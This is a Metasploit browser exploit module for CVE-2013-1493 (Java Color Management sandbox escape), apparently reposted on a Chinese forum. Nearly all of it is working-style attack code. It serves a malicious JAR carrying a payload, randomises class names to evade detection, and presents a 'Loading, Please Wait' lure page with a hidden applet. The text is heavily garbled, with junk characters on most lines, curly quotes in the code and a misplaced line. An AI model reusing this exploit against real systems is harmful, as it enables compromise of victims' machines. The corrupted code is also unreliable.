##! \, ~" }6 n# c- q1 k* A
' U7 V* Y! n8 e8 q3 g* L# This file is part of the Metasploit Framework and may be subject to
7 t* X- X' O7 [3 f: m3 J# redistribution and commercial restrictions. Please see the Metasploit$ I; N$ K' O2 a, b6 ~. n% y% R
# web site for more information on licensing and terms of use.+ A5 m9 M( q6 Z, w$ c
# http://metasploit.com// v1 [: S' |- P% F6 a& x+ k
##: u: X- ]& q2 H% _: Y3 B' c
require ‘msf/core’& Z3 m: y6 ~0 v. Y4 M
require ‘rex’9 T" ?2 f/ j! o
class Metasploit3 < Msf::Exploit::Remote
' T3 N2 }% l, J' D- @, D5 ~4 CRank = NormalRanking+ }: Q0 T z9 S, @$ K% s
include Msf::Exploit::Remote::HttpServer::HTML- ]7 v4 B; |+ G
include Msf::Exploit::EXE
. @( N3 s- U. T; \. N G3 Sinclude Msf::Exploit::Remote::BrowserAutopwn4 Z/ r( G9 X1 a7 x7 L7 v
autopwn_info({ :javascript => false })9 t" } ]0 ?2 b h$ y6 l
def initialize( info = {} )
, v5 F, G4 O0 jsuper( update_info( info,
/ U' A4 ~& D2 c# K6 S. D‘Name’ => ‘Java CMM Remote Code Execution’,
, N e& [0 Y; q6 ~% I‘Description’ => %q{: D9 g1 ^! I% i
This module abuses the Color Management classes from a Java Applet to run( d# ]9 K$ I$ G2 E) G
arbitrary Java code outside of the sandbox as exploited in the wild in February
+ x" Y9 H& W) Wand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41# i) O2 c/ `; |0 O
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP14 K9 w, W) }: B/ Z$ V6 U
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
0 X4 o+ L( h, Z! ^warning in order to run the malicious applet.
: W8 R0 w+ K7 @$ H},
% U$ j0 E& d) {4 b‘License’ => MSF_LICENSE,9 Q/ g0 \( V8 C% x7 F$ P$ ^
‘Author’ =>
9 [: f+ _& K8 }* n; L' l* q; v'Unknown', # Vulnerability discovery and Exploit
; N( B7 I1 T, e- l: j'juan vazquez' # Metasploit module (just ported the published exploit)
5 C( R4 ]6 ~6 X2 Z" P A6 L8 A],
- r9 W9 P, ~) T n' Y, T‘References’ =>
) t! e) H' Z: _% b" E0 F1 O4 j. r[! T. z' ]/ ?2 K8 S7 S
[ 'CVE', '2013-1493' ],
5 Q. l8 [5 G8 e[ 'OSVDB', '90737' ],
" }9 J V' M; [" e P; v& I[ 'BID', '58238' ],+ {6 f: `2 o% M. V. Z" k8 v, @- c
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],$ O: K+ _/ I2 _- m7 z. ]0 S) Y
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
O, A% V! K) z! _7 M! Q1 T0 E: r[ 'URL', 'http://pastie.org/pastes/6581034' ]
6 e7 R- A W( J],
$ L1 ?- ?% i/ Q( l- a‘Platform’ => [ 'win', 'java' ],
- p" `% {0 B( G/ H‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },% p( Y- A1 @6 r& I4 a
‘Targets’ =>
) E, Z O& m- j[
/ S. y& r( D7 ^7 W[ 'Generic (Java Payload)',1 u3 A* K6 ~( ^( i
{& h' }; k- U* u2 f" A
'Platform' => 'java',
- s4 A4 R0 f' X1 c'Arch' => ARCH_JAVA6 x" u5 w+ P& n; C B
}& R" _/ J" c6 b0 P
], m& o* e6 x# H, f* i! D) V
[ 'Windows x86 (Native Payload)',
3 Z, i$ [/ t2 p- d5 V& r{6 G+ Y0 T6 a1 ]6 q
'Platform' => 'win',- C% G2 ^6 h3 n; n6 f1 j" S
'Arch' => ARCH_X86& S$ e# r$ L& W2 d& Y
}" m9 {7 N0 a* b9 {- b1 |
]
: v$ @1 O8 _+ F+ E# C3 ]]," G. {1 K: z5 _! b/ k
‘‘DisclosureDate’ => ‘Mar 01 2013′
' u; G& _) P3 G4 y9 q7 T))( p% _% T/ x, z/ f
end0 V0 P7 v- a2 b# @1 ]. k
def setup
# W' C/ F5 x+ G% npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
) M8 f3 a. u) o7 P4 n@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 M5 y N" B4 E6 f1 ~% @- P# Bpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”); \- B+ K" e) a4 t
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }/ W2 S) y& b# F
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
( _( V/ z; {/ ]6 I( c d8 J@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
" x0 S% d5 r! r, Rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)* z6 x; `' E8 f/ s% J$ u6 Q
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 F7 }1 g- J8 o0 x! o* `2 C4 S/ ~* o
@init_class_name = rand_text_alpha(“Init”.length)
# S( ~8 `0 p3 T- v- L/ B1 f@init_class.gsub!(“Init”, @init_class_name)
; X9 Z. ~4 b8 w8 j) `super
* V) f5 l5 I* Lend
' X! e/ b+ B+ W! Edef on_request_uri(cli, request)* g a$ ^$ {, `& y% s4 o0 ?
print_status(“handling request for #{request.uri}”)) x" d8 K/ o- P
case request.uri. ]7 v6 [$ C6 v# H- n6 ]" l, ?& I* R
when /\.jar$/i
1 F* w( u3 s2 {3 z5 Rjar = payload.encoded_jar
4 s+ v* R5 q2 u2 R& z: t' vjar.add_file(“#{@init_class_name}.class”, @init_class)2 r% t2 Q. q: V: l4 `
jar.add_file(“Leak.class”, @leak_class)
* |! ~8 ]( K# _1 K/ j' I( g% Mjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
3 p; f0 k2 G2 g! w0 xjar.add_file(“MyColorSpace.class”, @color_space_class)
) A6 g& p2 F" D/ u1 G$ a( tDefaultTarget’ => 1,( m& f7 l, j2 C: Q
metasploit_str = rand_text_alpha(“metasploit”.length)
0 L3 j% y, _, m; C6 Upayload_str = rand_text_alpha(“payload”.length)
1 k. t V9 R( p* ]* y- ?1 J3 ljar.entries.each { |entry|
% e" \. t+ C+ P0 bentry.name.gsub!(“metasploit”, metasploit_str)
2 l- x6 b/ b" A" X: bentry.name.gsub!(“Payload”, payload_str)9 b6 P- U( g6 i
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
( f* G& w7 O7 [/ W: L1 T8 zentry.data = entry.data.gsub(“Payload”, payload_str)
8 w9 m" I) K% N D9 K- I2 Q& [( |; Y}- D: I5 k& @. h2 q. }
jar.build_manifest _: k0 ^2 _" ^1 \# a- N/ B' y
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” }); b: R2 \9 l8 ?+ o. j: M
when /\/$/
+ A" [( h: ~( N: g* [0 x- [payload = regenerate_payload(cli)6 ~/ a. n1 ]2 J5 h
if not payload* {8 c9 y/ ~' f9 p# W1 ~7 M
print_error(“Failed to generate the payload.”)
F" E4 E' x% C8 @. y; G: Msend_not_found(cli)( d$ V7 d: f5 Q$ x/ ~/ Q8 E
return
- h) W! C1 H7 Y5 Hend
, f6 T4 m. l5 O; g& k* e+ wsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })4 `, ]$ s1 m6 |$ \5 g" W
else
5 z; N X0 ~- t9 L- f- jsend_redirect(cli, get_resource() + ‘/’, ”)$ b/ z9 \5 n" a% `: |
end
1 O2 ^3 K v9 B# h/ B' Yend
, P6 `7 a0 Q; Z8 C+ adef generate_html
8 q L! E/ S2 K! f7 Ihtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
) R g" n3 v: |html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
7 l% o3 E/ w' V# Z' i5 uhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|( v. y' t$ u, `- o4 k/ ^# ^9 i
html += %Q|</applet></body></html>|) b3 u4 v* m7 ^" E+ j$ I
return html
' G, K. @3 n+ J* M) iend+ G. y: a9 h [6 m
end
/ z/ i+ ~5 Z! j; _end
' G$ L+ w& l, _% A1 g |
发表于 2013-4-4 17:31:17
收藏
支持
反对